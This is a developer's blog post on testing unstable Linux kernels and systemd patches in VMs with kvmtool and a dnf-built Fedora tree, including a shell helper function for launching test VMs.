This is of course not a new problem; systemd-nspawn was first implemented in 2011 as a simple tool to test systemd in an isolated environment. Over the years, systemd-nspawn grew in features and became more than a testing tool. Today, it is integrated with other components of the systemd project such as machinectl, and it can pull container or VM images and start them as systemd units. systemd-nspawn is also used as an internal component of the app container runtime, rkt.

When developing rkt, I often need to test patches in systemd-nspawn or other components of the systemd project, like systemd-machined. And since systemd-nspawn uses recent features of the Linux kernel that are still being developed (cgroups, user namespaces, etc.), I sometimes also need to test a different kernel or a different systemd-machined. In this case, testing with systemd-nspawn alone does not help, because I would still be using the kernel and systemd-machined installed on my computer.

I still don’t want to reboot nor do I want to install a non-stable kernel or non-stable systemd patches on my development computer. So today I am explaining how I am testing new kernels and new systemd with kvmtool and debootstrap.

Getting kvmtool

Why kvmtool? I want to be able to install systemd in my test environment easily with just a “make install”. I don’t want to have to prepare a testing image for each test but instead just use the same filesystem.

$ cd ~/git
$ git clone
$ cd kvmtool && make

Compiling a kernel

The kernel is compiled as usual but with the options listed in kvmtool’s README file (here’s the .config file I use). I just keep around the different versions of the kernels I want to test:

$ cd ~/git/linux
$ ls bzImage*
bzImage      bzImage-4.3         bzImage-cgroupns.v5  bzImage-v4.1-rc1-2-g1b852bc
bzImage-4.1  bzImage-4.3.0-rc4+  bzImage-v4.1-rc1     bzImage-v4.3-rc4-15-gf670268
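For reference, kvmtool expects virtio support built into the kernel; from memory, the essential options are along these lines (consult kvmtool’s README for the authoritative list):

```text
CONFIG_VIRTIO=y
CONFIG_VIRTIO_PCI=y
CONFIG_VIRTIO_BLK=y
CONFIG_VIRTIO_NET=y
CONFIG_VIRTIO_CONSOLE=y
```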

Getting the filesystem for the test environment

The man page of systemd-nspawn explains how to install a minimal Fedora, Debian or Arch distribution in a directory with the dnf, debootstrap or pacstrap commands respectively.

sudo dnf -y --releasever=22 --nogpg --installroot=${HOME}/distro-trees/fedora-22 --disablerepo='*' --enablerepo=fedora install systemd passwd dnf fedora-release vim-minimal

Set the root password of your Fedora 22 tree the first time; after that, you are ready to boot it:

sudo systemd-nspawn -D ${HOME}/distro-trees/fedora-22 passwd

I don’t have to actually boot it with kvmtool to update the system. systemd-nspawn is enough:

sudo systemd-nspawn -D ${HOME}/distro-trees/fedora-22 dnf update

Installing systemd

$ cd ~/git/systemd
$ ./
$ ./configure CFLAGS='-g -O0 -ftrapv' --enable-compat-libs --enable-kdbus --sysconfdir=/etc --localstatedir=/var --libdir=/usr/lib64
$ make
$ sudo DESTDIR=$HOME/distro-trees/fedora-22 make install
$ sudo DESTDIR=$HOME/distro-trees/fedora-22/fedora-tree make install

As you may have noticed, I am installing systemd both in ~/distro-trees/fedora-22 and in ~/distro-trees/fedora-22/fedora-tree. The first is for the VM started by kvmtool, and the second is for the container started by systemd-nspawn inside the VM.

Running a test

I can easily test my systemd patches quickly with various versions of the kernel and various Linux distributions. I can also start systemd-nspawn inside lkvm if I want to test the interaction between systemd, systemd-machined and systemd-nspawn. All of this, without rebooting or installing any unstable software on my main computer.

I am sourcing the following in my shell:

test_kvm() {
        distro=$1
        kernelver=$2
        kernelparams=$3

        kernelimg=${HOME}/git/linux/bzImage-${kernelver}
        distrodir=${HOME}/distro-trees/${distro}

        if [ ! -f $kernelimg -o ! -d $distrodir ] ; then
                echo "Usage: test_kvm distro kernelver kernelparams"
                echo "       test_kvm fedora-22 4.3 systemd.unified_cgroup_hierarchy=1"
                return 1
        fi

        sudo ${HOME}/git/kvmtool/lkvm run --name ${distro}-${kernelver} \
                --kernel ${kernelimg} \
                --disk ${distrodir} \
                --mem 2048 \
                --network virtio \
                --params "${kernelparams}"
}
Then, I can just test rkt or systemd-nspawn with the unified cgroup hierarchy:

$ test_kvm fedora-22 4.3 systemd.unified_cgroup_hierarchy=1


With this setup, I could test cgroup namespaces in systemd-nspawn with the kernel patches that are being reviewed upstream and my systemd patches without rebooting or installing them on my development computer.